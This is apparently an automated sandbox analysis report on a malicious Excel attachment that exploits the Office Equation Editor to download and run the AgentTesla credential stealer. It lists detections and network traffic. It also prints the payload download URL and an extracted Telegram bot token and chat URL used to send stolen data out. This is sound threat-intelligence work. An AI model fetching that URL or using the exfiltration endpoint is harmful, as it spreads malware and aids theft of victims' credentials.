Play interactive tour

Edit tour

Analysis Report New Order for April#89032.xlsx

Overview

General Information

Sample Name:	New Order for April#89032.xlsx
Analysis ID:	383941
MD5:	d7928e685d37d907d102cecdf3d3ce8b
SHA1:	3404ab865cdfb6c4a71151f5ae7bd17b92206885
SHA256:	a2bfcc72f1a7a817323c32d758b45716541e4c3a7e33a7d3939638a6a2e8eaaa
Tags:	VelvetSweatshopxlsx
Infos:
Most interesting Screenshot:

Detection

AgentTesla Telegram RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected Telegram RAT

Drops PE files to the user root directory

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Uses the Telegram API (likely for C&C communication)

Allocates a big amount of memory (probably used for heap spraying)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Drops PE files to the user directory

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

PE file contains strange resources

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Startup

System is w7x64

EXCEL.EXE (PID: 2232 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)

EQNEDT32.EXE (PID: 2548 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

vbc.exe (PID: 2672 cmdline: 'C:\Users\Public\vbc.exe' MD5: 5F968F612F82F74C96DD257793CF917D)

vbc.exe (PID: 2868 cmdline: C:\Users\Public\vbc.exe MD5: 5F968F612F82F74C96DD257793CF917D)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2672	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2672	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: vbc.exe PID: 2868	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: vbc.exe PID: 2868	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vbc.exe PID: 2868	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 6 entries

Unpacked PEs

Source	Rule	Description	Author
4.2.vbc.exe.3446ec0.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
5.2.vbc.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
4.2.vbc.exe.3446ec0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Sigma Overview

System Summary:

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 198.23.174.104, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2548, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2548, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://198.23.174.104/hkn.exe

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 5.2.vbc.exe.400000.0.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "Telegram", "Chat id": "1063661839", "Chat URL": "https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe	ReversingLabs: Detection: 16%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 16%

Multi AV Scanner detection for submitted file

Show sources

Source: New Order for April#89032.xlsx

ReversingLabs: Detection: 31%

Machine Learning detection for dropped file

Show sources

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe	Joe Sandbox ML: detected

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

Source: excel.exe

Memory has grown: Private usage: 4MB later: 74MB

Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_00DA61B0
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_00DA61A1
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_00DA62D0
Source: C:\Users\Public\vbc.exe	Code function: 4x nop then mov dword ptr [ebp-18h], 00000000h	4_2_00DA62E0

Source: global traffic

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.22:49168 -> 149.154.167.220:443

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 198.23.174.104:80

Networking:

Uses the Telegram API (likely for C&C communication)

Show sources

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 08 Apr 2021 10:50:31 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27Last-Modified: Thu, 08 Apr 2021 08:14:53 GMTETag: "d7200-5bf71a458267a"Accept-Ranges: bytesContent-Length: 881152Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7d bb 6e 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 2a 0a 00 00 46 03 00 00 00 00 00 66 49 0a 00 00 20 00 00 00 60 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0d 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 49 0a 00 4f 00 00 00 00 60 0a 00 2c 42 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0d 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6c 29 0a 00 00 20 00 00 00 2a 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 2c 42 03 00 00 60 0a 00 00 44 03 00 00 2c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0d 00 00 02 00 00 00 70 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 48 49 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 80 3f 00 00 cc 48 00 00 03 00 00 00 01 00 00 06 4c 88 00 00 c8 c0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 1f 00 00 0a 28 20 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 21 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 22 00 00 0a 00 02 16 28 23 00 00 0a 00 02 17 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 16 28 26 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 6c 00 00 06 28 27 00 00 0a 00 2a 26 00 02 28 28 00 00 0a 00 2a ce 73 29 00 00 0a 80 01 00 00 04 73 2a 00 00 0a 80 02 00 00 04 73 2b 00 00 0a 80 03 00 00 04 73 2c 00 00 0a 80 04 00 00 04 73 2d 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2e 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 04 00 00 11 00 7e 04 00 00 04 6f 31 00 00 0a 0

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 198.23.174.104 198.23.174.104

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Source: Joe Sandbox View

JA3 fingerprint: 36f7277af969a6947a61ae0b815907a1

Source: global traffic

HTTP traffic detected: GET /hkn.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 198.23.174.104Connection: Keep-Alive

Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104
Source: unknown	TCP traffic detected without corresponding DNS query: 198.23.174.104

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\65BB8ECE.emf

Jump to behavior

Source: global traffic

Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: unknown

DNS traffic detected: queries for: api.telegram.org

Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	String found in binary or memory: http://WrqCET.com
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://api.telegram.org
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://certs.godaddy.com/repository/1301
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: vbc.exe, 00000005.00000002.2380259910.00000000005B7000.00000004.00000020.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdig2s1-1823.crl0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot-g2.crl0F
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://crl.godaddy.com/gdroot.crl0F
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0%
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0-
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0/
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com05
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net03
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.entrust.net0D
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/0
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/02
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.godaddy.com/05
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000004.00000002.2167842702.00000000023A1000.00000004.00000001.sdmp, vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: vbc.exe, 00000005.00000002.2381723294.0000000005DC0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: vbc.exe, 00000005.00000002.2380811356.00000000025A4000.00000004.00000001.sdmp	String found in binary or memory: https://YiNu10TJVGgbJcx5.com
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380230451.0000000000583000.00000004.00000020.sdmp	String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocument
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot1620445910:AAF2v81NoINJsu_XXnpGet1YDm-NxnznaIE/sendDocumentdocument-----
Source: vbc.exe, 00000005.00000002.2380868678.00000000025F8000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.orgP
Source: vbc.exe, 00000005.00000002.2380885762.000000000260D000.00000004.00000001.sdmp	String found in binary or memory: https://certs.godaddy.com/repository/0
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: https://dist.nuget.org/win-x86-commandline/latest/nuget.exe
Source: vbc.exe, vbc.exe.2.dr	String found in binary or memory: https://github.com/Spegeli/Pokemon-Go-Rocket-API/archive/master.zip
Source: vbc.exe, vbc.exe, 00000005.00000002.2380578713.0000000000DB2000.00000020.00020000.sdmp, vbc.exe.2.dr	String found in binary or memory: https://github.com/d-haxton/HaxtonBot/archive/master.zip
Source: vbc.exe, 00000005.00000002.2381472364.0000000004F5F000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: vbc.exe, 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp	String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
Source: vbc.exe, 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, vbc.exe, 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: vbc.exe, 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49168
Source: unknown	Network traffic detected: HTTP traffic on port 49168 -> 443

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hkn[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E20000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76D20000 page execute and read and write	Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00535404 NtQueryInformationProcess,		4_2_00535404
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053539F NtQueryInformationProcess,		4_2_0053539F

Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DB2050	4_2_00DB2050
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053F050	4_2_0053F050
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00530288	4_2_00530288
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005362B0	4_2_005362B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00538378	4_2_00538378
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00532402	4_2_00532402
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005374D0	4_2_005374D0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00535700	4_2_00535700
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005327D8	4_2_005327D8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005339C1	4_2_005339C1
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00536AE0	4_2_00536AE0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00533DA0	4_2_00533DA0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053E190	4_2_0053E190
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00539278	4_2_00539278
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053926A	4_2_0053926A
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053539F	4_2_0053539F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A450	4_2_0053A450
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A460	4_2_0053A460
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053B5C0	4_2_0053B5C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A670	4_2_0053A670
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A680	4_2_0053A680
Source: C:\Users\Public\vbc.exe	Code function: 4_2_005327C8	4_2_005327C8
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053E830	4_2_0053E830
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A8C0	4_2_0053A8C0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053A8B0	4_2_0053A8B0
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00539908	4_2_00539908
Source: C:\Users\Public\vbc.exe	Code function: 4_2_0053AAB9	4_2_0053AAB9
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00539E10	4_2_00539E10
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00539E00	4_2_00539E00
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00530E20	4_2_00530E20
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA0048	4_2_00DA0048
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA1960	4_2_00DA1960
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA4A80	4_2_00DA4A80
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA46BF	4_2_00DA46BF
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA2880	4_2_00DA2880
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA286F	4_2_00DA286F
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA4C64	4_2_00DA4C64
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA0012	4_2_00DA0012
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA1950	4_2_00DA1950
Source: C:\Users\Public\vbc.exe	Code function: 4_2_00DA1E17	4_2_00DA1E17
